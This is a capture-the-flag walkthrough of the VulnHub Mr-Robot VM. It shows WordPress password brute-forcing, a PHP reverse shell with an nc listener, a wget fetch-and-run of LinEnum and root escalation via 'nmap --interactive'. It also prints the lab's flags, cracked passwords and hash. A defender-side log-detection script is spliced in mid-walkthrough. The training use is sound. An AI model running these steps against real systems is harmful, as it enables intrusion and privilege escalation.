[VULNHUB] Mr-Robot: 1

Mr. Robot is a VulnHub VM inspired by the TV series of the same name. The goal is to find 3 .txt keys located in 3 different places.

FLAG 1

The first thing to do is to perform an nmap scan to see which ports are open:

nmap 192.168.1.11

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-07-31 17:15 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00091s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 4.81 seconds

So there is a website with both HTTP and HTTPS protocol.
Opening 192.168.1.11 in the browser I can see a semi-realistic interactive shell where I can watch some Mr. Robot videos and other content. I run a scan with nikto to see whether the website has anything interesting for me:

nikto -h 192.168.1.11

This is what nikto revealed:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.11
+ Target Hostname: 192.168.1.11
+ Target Port: 80
+ Start Time: 2016-07-31 17:39:46 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ /readme.html: This WordPress file reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ 7535 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-07-31 18:01:47 (GMT2) (1321 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First of all I notice that this site is built with WordPress, and opening /readme.txt I discovered that the version is 4.3.5, which has no known vulnerabilities at the moment. Let's check /robots.txt too:

User-agent: *
fsocity.dic
key-1-of-3.txt

Awesome, I found the first key! Opening /key-1-of-3.txt shows the content of the file: 073403c8a58a1f80d943455fb30724b9. Now I can move on to the second key.

FLAG 2

There is another interesting file listed in robots.txt: a dictionary file. I download it, since it can be useful to brute force the WordPress login password, but before that I need to find a valid user name. So I navigate to /wp-login and start trying some possible user names. Thinking of the TV series, I tried the name of the main character (elliot) with a random password, and it worked! In fact the WordPress login page returned an error message:

ERROR: The password you entered for the username elliot is incorrect. Lost your password?

That means the user name exists but I need to find a valid password. I can use the dictionary file I downloaded two minutes ago, but first I check its content:

cat fsocity.dic

There are a lot of strings, but I want to do another check: sort the dictionary alphabetically:

sort fsocity.dic

After this command I noticed that many strings are repeated many times, so I need to remove the duplicates:

sort fsocity.dic | uniq > fsocity.txt

With the previous command I also saved the new dictionary with a .txt extension. Now I can try to brute force the password of the user elliot with Burp Suite. First I intercepted the POST login request with the proxy, then I sent the request to Intruder and loaded fsocity.txt as the password payload. After some minutes, sorting the requests by response length, I found elliot's password: ER28-0652. Now I can log in, but to find the second key I probably need a shell on the web server. Navigating in the WordPress menu to Appearance->Editor I can edit 404.php and inject a PHP reverse shell; I used this one (remember to edit lines 49 and 50 with your settings). Now I listen for the incoming connection:

sudo nc -lvp 1234

Then I navigate to /something (any non-existent page, so that the edited 404.php runs) and the reverse shell opens. Browsing to /home I noticed the /robot user folder. I opened it and found 2 files:
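A defender-side example, added here and not part of the original walkthrough, showing how the steps above look in an Apache access log: a burst of failed POSTs to wp-login.php from one IP, a 302 right after the burst when the dictionary hits, and a POST to theme-editor.php when 404.php is edited. The log lines are constructed for the example, not captured from the VM, and the threshold of 20 attempts is an assumed tuning value.

```python
import re
from collections import defaultdict

LINE_RE = re.compile(  # Apache combined-log prefix: ip, timestamp, request, status, size
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def build_sample_log():
    """Constructed log lines (not real data): dictionary attack, hit, theme-editor edit."""
    fmt = '{ip} - - [31/Jul/2016:18:{m:02d}:{s:02d} +0200] "{req} HTTP/1.1" {st} {sz}'
    lines = []
    for i in range(30):                    # failed attempts: login form re-rendered with 200
        lines.append(fmt.format(ip="10.0.0.5", m=10, s=i, req="POST /wp-login.php", st=200, sz=3402))
    lines.append(fmt.format(ip="10.0.0.5", m=11, s=0, req="POST /wp-login.php", st=302, sz=0))
    lines.append(fmt.format(ip="10.0.0.5", m=12, s=0, req="POST /wp-admin/theme-editor.php", st=302, sz=0))
    for i in range(2):                     # a legitimate user who mistyped twice
        lines.append(fmt.format(ip="10.0.0.9", m=13, s=i, req="POST /wp-login.php", st=200, sz=3402))
    return lines

def analyse(lines, threshold=20):
    """Per-IP counters: failed wp-login POSTs, success after a burst, theme edits."""
    stats = defaultdict(lambda: {"failed_logins": 0, "success_after_burst": False, "theme_edit": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, status = m["ip"], m["method"], m["status"]
        path = m["path"].split("?", 1)[0]
        s = stats[ip]
        if method == "POST" and path == "/wp-login.php":
            if status == "200":            # WordPress answers a wrong password with the form again
                s["failed_logins"] += 1
            elif status == "302" and s["failed_logins"] >= threshold:
                s["success_after_burst"] = True   # redirect to wp-admin means valid credentials
        elif method == "POST" and path == "/wp-admin/theme-editor.php":
            s["theme_edit"] = True
    return dict(stats)

def alerts(lines, threshold=20):
    """Human-readable findings from analyse(); an empty list means nothing suspicious."""
    out = []
    for ip, s in analyse(lines, threshold).items():
        if s["failed_logins"] >= threshold:
            out.append(f"{ip}: {s['failed_logins']} failed wp-login POSTs (dictionary attack?)")
        if s["success_after_burst"]:
            out.append(f"{ip}: login succeeded right after the failed burst")
        if s["theme_edit"]:
            out.append(f"{ip}: theme file edited via theme-editor.php (check 404.php for injected code)")
    return out
```

Running alerts(build_sample_log()) flags 10.0.0.5 three times and says nothing about 10.0.0.9, whose two failures stay below the threshold.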

key-2-of-3.txt
password.raw-md5

Unfortunately I can't read the key file because I don't have permission, but I can read the content of the second file:

cat password.raw-md5

Which is:

robot:c3fcd3d76192e4007dfb496cca67e13b

So I need to crack the MD5 hash of robot's password. I just used HashKiller: paste the MD5 string and the password is cracked instantly. So robot's password is abcdefghijklmnopqrstuvwxyz. Now I can log in as robot from the shell, but first I need a tty. I can use Python for this:

python -c 'import pty; pty.spawn("/bin/bash")'

Now that I have a tty shell I can login as robot:

su robot

Enter the cracked password and navigate to /home/robot. Now I can read the second key:

cat key-2-of-3.txt

Which is 822c73956184f694993bede3eb39f959.

FLAG 3

Now only one key remains. Maybe I need to check the root directory of the web server, but I don't have permission with robot's account, so I can try to escalate privileges: I used LinEnum. First I download the script into the /tmp folder:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Then make the script executable:

chmod +x LinEnum.sh

And finally run it:

./LinEnum.sh

At the end I noticed this section of the output:

### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/local/bin/nmap
/usr/bin/gcc

nmap is installed on the system, and if I can run it, maybe I can get an interactive shell and execute commands as root. So I run nmap:

nmap --interactive

Yes! I got an interactive shell; now just use:

!sh

Now I have a shell as root. Navigate to /root and list the files. There is the last key, just print it:

cat key-3-of-3.txt

The third key is 04787ddef27c3dee1ee161b21670b4e4 and the CTF is complete!
